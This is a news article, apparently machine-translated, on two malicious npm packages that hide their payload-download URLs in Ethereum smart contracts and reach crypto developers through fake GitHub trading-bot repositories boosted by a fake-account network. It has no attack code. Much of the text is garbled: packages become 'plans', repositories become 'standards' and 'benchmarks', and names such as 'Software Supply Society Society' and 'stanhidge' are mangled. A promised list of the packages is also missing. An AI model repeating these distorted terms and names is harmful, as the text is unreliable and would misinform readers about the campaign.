The malicious NPM packages exploit Ethereum intelligent contracts to target cryptography developers
Cybersecurity researchers have discovered two new malicious plans on the NPM register that use smart contracts for Ethereum blockchain to carry out malware on compromise systems, constantly signaling the trend of threat actors on the search for new ways of distributing malware and flying under the radar.
“The two NPM packages have abused intelligent contracts to hide malicious orders that have installed malware to download on compromise systems,” said the researcher, unlike Lucija Valentić in a shared relationship with the Hacker News.
The packages, both downloaded on NPM in July 2025 and are no longer available for download, are listed below –
The Software Supply Society Society said that libraries were part of a larger and sophisticated campaign with an impact on NPM and GitHub, encouraging without distrust developers to download and execute them.
Although the packages themselves have no effort to hide their malicious features, Reversinglabs noted that the Github projects that imported these packages have taken problems making them credible.
Regarding the packages themselves, the harmful behavior comes into play once one or the other is used or included in another project, which makes him recover and execute a payload at the next step from a server controlled by the attacker.
Although this is normal for the course with regard to malware downloaders, where it separates is the use of Ethereum intelligent contracts to stage the URLs hosting the payload – a technique recalling the stanhidge. The change highlights the new tactics that threatened actors adopt to escape detection.
A more in-depth survey on the packages has revealed that they are referenced in a network of GitHub standards claiming to be a Solana-Trading-Bob-V2 which operates “real-time chain data to automatically execute transactions, saving you time and efforts”. The GitHub account associated with the repository is no longer available.
It is assessed that these accounts are part of a distribution offer as a service (DAAS) called Stargazers Ghost Network, which refers to a group of false GitHub accounts which are known to play, fork, watch, commit and subscribe to malicious benchmarks to artificially inflate their popularity.
Among these commits, the modifications of source code to import Colortoolsv2 are included. Some of the other benchmarks captured by pushing the NPM package are Ethereum-Mev-V2, Arbitration-Botta and Hyperliquid-Trading-BOT.
The name of these GitHub standards suggest that developers and cryptocurrency users are the main target of the campaign, using a combination of social engineering and deception.
“It is essential for developers to assess each library that they plan to implement before deciding to include it in their development cycle,” said Valentić. “And this means removing the blankets on the open source packages and their maintainers: looking beyond the raw numbers of maintainers, commitments and downloads to assess whether a given package – and the developers behind – are what they are presented.”
